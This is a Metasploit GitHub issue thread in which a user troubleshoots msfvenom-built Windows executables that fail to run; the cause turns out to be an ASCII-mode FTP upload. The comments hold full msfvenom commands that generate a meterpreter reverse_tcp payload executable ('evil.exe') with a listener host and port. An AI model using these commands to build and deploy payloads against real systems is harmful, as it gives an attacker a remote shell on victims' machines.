### ISSUE TITLE
error: Invalid payload specified!

### ISSUE THREAD

**Issue by hytd** [rapid7/metasploit-framework#7475]
run 

msfvenom -p windows/meterpreter/reverse_tcp -f exe > test.exe

error

windows 7 x64 run test.exe prompt

Not a valid win32 program

help me

farmword version: 4.12.22-dev

system:kali(2016-07-21)

I did not update the system

**Comment by hytd** [comment]
run

msfvenom -p windows/meterpreter/reverse_tcp lhost=x.x.x.xlport=4444 -f exe -o test.exe

prompt

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Saved as: test.exe

**Comment by nixawk** [comment]
Please try **`-f exe-only`**,

```
->> ./msfvenom --help-formats
Executable formats
	asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war
Transform formats
	bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript
```

```
->> ./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe-only -o /tmp/evil.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe-only file: 73802 bytes
Saved as: /tmp/evil.exe
```

**Comment by hytd** [comment]
run x86 prompt

No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe-only file: 73802 bytes
Saved as: evil.exe

run x86_64 prompt

No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe-only file: 6144 bytes
Saved as: evil.exe

win7 x64 run evil(x86 and x86_64) prompt


This file and version are not compatible with the version of Windows that is running

----------------------------------------------------------------------------------------------------------

                                                                                                                              Thanks for the answer

**Comment by hytd** [comment]
I was running directly msfvenom (/usr/bin/msfbenom)

No (./)

metasploit path (/usr/share/metasploit-framework)

**Comment by nixawk** [comment]
What's the OS lab version ? Details will be more helpful.

**Comment by hytd** [comment]
run uname -a prompt

Linux bogon 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux

run cat /proc/version prompt

Linux version 4.6.0-kali1-amd64 (devel@kali.org) (gcc version 5.4.0 20160609 (Debian 5.4.0-6) ) #1 SMP Debian 4.6.4-1kali1 (2016-07-21)

run cat /etc/issue prompt

Kali GNU/Linux Rolling \n \l

run getconf LONG_BIT prompt

64

run cat /proc/cpuinfo prompt

processor       : 0
vendor_id       : GenuineIntel
cpu family      : 6
model           : 42
model name      : Intel(R) Core(TM) i5-2450M CPU @ 2.50GHz
stepping        : 7
cpu MHz         : 2494.342
cache size      : 3072 KB
physical id     : 0
siblings        : 1
core id         : 0
cpu cores       : 1
apicid          : 0
initial apicid  : 0
fpu             : yes
fpu_exception   : yes
cpuid level     : 13
wp              : yes
flags           : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc eagerfpu pni pclmulqdq monitor ssse3 cx16 sse4_1 sse4_2 x2apic popcnt aes xsave avx hypervisor lahf_lm
bugs            :
bogomips        : 4988.68
clflush size    : 64
cache_alignment : 64
address sizes   : 36 bits physical, 48 bits virtual
power management:

-----

myhost win7 x64 

virtualbox version 5.1.8 r111374 (qt5.51)

**Comment by hytd** [comment]
thank you

**Comment by hytd** [comment]
The wrong reason is that I use the ftp command to upload exe file

**Comment by hytd** [comment]
Because I use virtualbox so copying files inconvenient

So I run the ftp command

ftp

ftp>open 992.168.x.x
ftp>put evil.exe
ftp>exit

The ftp command may be uploaded using             ASSIC
